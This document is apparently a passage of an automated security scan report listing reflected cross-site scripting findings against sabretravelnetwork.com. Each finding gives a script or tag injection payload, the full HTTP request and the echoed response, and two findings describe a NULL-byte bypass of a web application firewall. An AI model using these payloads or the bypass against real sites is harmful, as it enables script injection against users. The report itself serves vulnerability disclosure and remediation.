P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:27 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6||MIA|10/04/11|||||||MIA|BOS||10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:27 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:55:26 GMT
Content-Length: 65550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<p class="error">We can't find the following location: "BOS5997f<a>49d5ff584c8". Please check the spelling, and enter a city name or airport code.</p>
...[SNIP]...

4.351. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55bd4"><script>alert(1)</script>0ad586733cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4"><script>alert(1)</script>0ad586733cb?css=includes/local_exceptions.v.1235614021 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618493; expires=Tue, 02-Oct-2012 00:08:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4"><script>alert(1)</script>0ad586733cb?css=includes/local_exceptions.v.1235614021">
...[SNIP]...

4.352. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0665<a>d9bbd13bca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homeb0665<a>d9bbd13bca2?css=includes/local_exceptions.v.1235614021 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618493; expires=Tue, 02-Oct-2012 00:08:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d9bbd13bca2?css=includes">homeb0665<a>d9bbd13bca2?css=includes</a>
...[SNIP]...

4.353. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0336<a>37f18bb685c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homea0336<a>37f18bb685c/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618426; expires=Tue, 02-Oct-2012 00:07:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>37f18bb685c">homea0336<a>37f18bb685c</a>
...[SNIP]...

4.354. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef105"><a>e4de0a727fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homeef105"><a>e4de0a727fd/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618421; expires=Tue, 02-Oct-2012 00:07:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/homeef105"><a>e4de0a727fd">
...[SNIP]...

4.355. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc642<a>5bcd5f2dd13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homedc642<a>5bcd5f2dd13/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:09:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622190; expires=Tue, 02-Oct-2012 01:09:50 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractse92c1ab4e44194d35e%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractsf713cabeee734755a5%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:09:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>5bcd5f2dd13">homedc642<a>5bcd5f2dd13</a>
...[SNIP]...

4.356. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ca1"><script>alert(1)</script>7930a41e3ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /homee3ca1"><script>alert(1)</script>7930a41e3ba/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:09:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622187; expires=Tue, 02-Oct-2012 01:09:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractse92c1ab4e44194d35e%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractsf713cabeee734755a5%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:09:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/homee3ca1"><script>alert(1)</script>7930a41e3ba/products_services">
...[SNIP]...

4.357. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %002fe48<a>3768ca006c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fe48<a>3768ca006c9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index/?%002fe48<a>3768ca006c9=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:08:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622102; expires=Tue, 02-Oct-2012 01:08:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services2c5deab90be61d62c8%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_servicesd302bab25f3e4afffc%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:08:25 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130365


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a>3768ca006c9=1">?%002fe48<a>3768ca006c9=1</a>
...[SNIP]...

4.358. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0095469"><a>31da79be35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95469"><a>31da79be35d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index/?%0095469"><a>31da79be35d=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622029; expires=Tue, 02-Oct-2012 01:07:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:11 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/home/products_services/product_index/?%0095469"><a>31da79be35d=1">
...[SNIP]...

4.359. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3098c<a>037679025cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home3098c<a>037679025cb/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622038; expires=Tue, 02-Oct-2012 01:07:18 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:18 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>037679025cb">home3098c<a>037679025cb</a>
...[SNIP]...

4.360. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79af8"><script>alert(1)</script>8f014a76d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home79af8"><script>alert(1)</script>8f014a76d97/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
